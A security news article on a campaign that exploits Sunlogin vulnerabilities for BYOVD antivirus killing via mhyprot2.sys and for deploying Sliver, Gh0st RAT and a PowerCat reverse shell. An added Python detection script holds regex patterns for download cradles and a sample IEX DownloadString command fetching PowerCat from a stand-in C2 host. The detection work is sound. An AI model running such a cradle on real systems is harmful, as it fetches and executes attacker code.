Chinese Sunlogin remote control program actively used in BYOVD attacks

A new hacker campaign exploits vulnerabilities in the Sunlogin remote access program to deploy the Sliver post-exploitation tool and to carry out BYOVD (Bring Your Own Vulnerable Driver) attacks that disable antivirus products.

Sliver is a post-exploitation tool created by BishopFox, which attackers began using as an alternative to Cobalt Strike last summer. They use it for network surveillance, command execution, DLL loading, session creation, process manipulation, and so on.

According to a report by the AhnLab Security Emergency Response Center (ASEC), the recently identified attacks targeted two vulnerabilities found in the Sunlogin remote access software.

The attackers exploit these vulnerabilities to compromise the device and then run PowerShell scripts that launch reverse shells or install other payloads such as Sliver, Gh0st RAT, or the XMRig Monero miner.

Commands supported by Sliver

The attack begins with exploitation of the vulnerabilities CNVD-2022-10270 / CNVD-2022-03672, which affect Sunlogin version 11.0.0.33 and earlier. The attackers use them to run an obfuscated PowerShell script that disables antivirus products before the backdoors are deployed.

The script decodes the .NET file it carries and loads it into memory. This executable is a modified version of the open source mhyprot2DrvControl, a tool created to abuse vulnerable Windows drivers.

mhyprot2DrvControl abuses mhyprot2.sys, an anti-cheat driver carrying the digital signature of the Chinese game Genshin Impact. According to Trend Micro, this driver has been used by ransomware operators since last year.

“The developer of mhyprot2DrvControl provided many functions that can be used with the elevated privileges of mhyprot2.sys. Among them, for example, is a function that allows forcibly terminating antivirus processes, which is very useful for developing malware,” ASEC specialists explain in their report.

The second part of the PowerShell script downloads PowerCat from an external source and uses it to launch a reverse shell that connects to the C2 server, giving the attacker remote access to the compromised device.

In some cases the attack was followed by installation of the Sliver implant (“ACL.exe”). The attackers also installed Gh0st RAT, which provides remote file management, keylogging, remote command execution, and data exfiltration capabilities.
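The chain described above (the Sunlogin process spawning a shell, an encoded PowerShell download cradle that fetches PowerCat, a load of the mhyprot2.sys driver, and an implant named ACL.exe) lends itself to simple host-based detection. The following Python script is an added example, not code from the article or from ASEC: it runs a few rules over constructed Sysmon-style process-creation and driver-load events and decodes any -EncodedCommand payload before matching. The parent process name SunloginClient.exe, the file paths, the URL and the field names are assumptions made for the illustration; only mhyprot2.sys and ACL.exe come from the article.

```python
"""Added detection example for the Sunlogin / BYOVD chain described in the article.
The events below are constructed, Sysmon-style records, not real telemetry."""
import base64
import ntpath
import re

# Rule inputs. mhyprot2.sys and the implant name ACL.exe come from the article;
# SunloginClient.exe as the parent process name is an assumption for this example.
VULNERABLE_DRIVERS = {"mhyprot2.sys"}        # extend from Microsoft's vulnerable driver blocklist
SUSPICIOUS_NAMES = {"acl.exe"}                # weak indicator: reported Sliver implant name
SUNLOGIN_PARENTS = {"sunloginclient.exe"}     # assumed Sunlogin process name
SHELLS = {"powershell.exe", "cmd.exe"}

# -e/-ec/-enc/-encodedcommand followed by a base64 blob (PowerShell accepts prefixes).
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Download-and-execute cradle keywords, matched against the plain or decoded command line.
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-Expression|\bIEX\b", re.IGNORECASE)

# Constructed sample: the encoded command is built here so the base64 is exact.
DECODED_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/powercat.ps1')"
ENCODED_CRADLE = base64.b64encode(DECODED_CRADLE.encode("utf-16-le")).decode("ascii")

# Sysmon event IDs: 1 = process creation, 6 = driver loaded. All values are constructed.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Example\SunloginClient.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + ENCODED_CRADLE},
    {"EventID": 6, "ImageLoaded": r"C:\Windows\Temp\mhyprot2.sys",
     "Signature": "constructed: Genshin Impact anti-cheat signer"},
    {"EventID": 1, "Image": r"C:\Users\Public\ACL.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "ACL.exe"},
]
BENIGN_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe", "CommandLine": "svchost.exe -k netsvcs"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Process"},
    {"EventID": 6, "ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys",
     "Signature": "Microsoft Windows"},
]


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind a PowerShell -EncodedCommand argument, or None."""
    match = ENC_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def effective_command(cmdline):
    """Plain command line plus any decoded -EncodedCommand payload, for keyword matching."""
    decoded = decode_encoded_command(cmdline)
    return cmdline if decoded is None else cmdline + " " + decoded


def detect(events):
    """Return (event index, rule name) pairs for every rule an event trips."""
    hits = []
    for i, ev in enumerate(events):
        if ev.get("EventID") == 1:
            image = ntpath.basename(ev.get("Image", "")).lower()
            parent = ntpath.basename(ev.get("ParentImage", "")).lower()
            cmd = effective_command(ev.get("CommandLine", ""))
            if parent in SUNLOGIN_PARENTS and image in SHELLS:
                hits.append((i, "sunlogin_spawned_shell"))
            if image == "powershell.exe" and DOWNLOAD_CRADLE.search(cmd):
                hits.append((i, "powershell_download_cradle"))
            if "powercat" in cmd.lower():
                hits.append((i, "powercat_reference"))
            if image in SUSPICIOUS_NAMES:
                hits.append((i, "reported_implant_name"))
        elif ev.get("EventID") == 6:
            driver = ntpath.basename(ev.get("ImageLoaded", "")).lower()
            if driver in VULNERABLE_DRIVERS:
                hits.append((i, "vulnerable_driver_loaded"))
    return hits


# Rules that together reproduce the chain from the article; all three => high confidence.
CHAIN_RULES = {"sunlogin_spawned_shell", "powershell_download_cradle", "vulnerable_driver_loaded"}


def assess(events):
    """Summarise a host's events as (verdict, sorted rule names)."""
    rules = {rule for _, rule in detect(events)}
    if CHAIN_RULES <= rules:
        verdict = "likely_sunlogin_byovd_chain"
    elif rules:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return verdict, sorted(rules)


if __name__ == "__main__":
    for name, events in (("sample", SAMPLE_EVENTS), ("benign", BENIGN_EVENTS)):
        print(name, assess(events))
```

The driver-load rule matches on file name only; in production the Sysmon `Signature` and `Hashes` fields should be compared against the Microsoft blocklist, since a renamed copy of the same signed driver loads just as well. Decoding `-EncodedCommand` before keyword matching is what lets the cradle rule fire on the first sample event, whose plain command line contains nothing suspicious.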

Microsoft recommends that Windows administrators enable the vulnerable driver blocklist to protect against BYOVD attacks. How to do this is described in detail in a Microsoft support article.
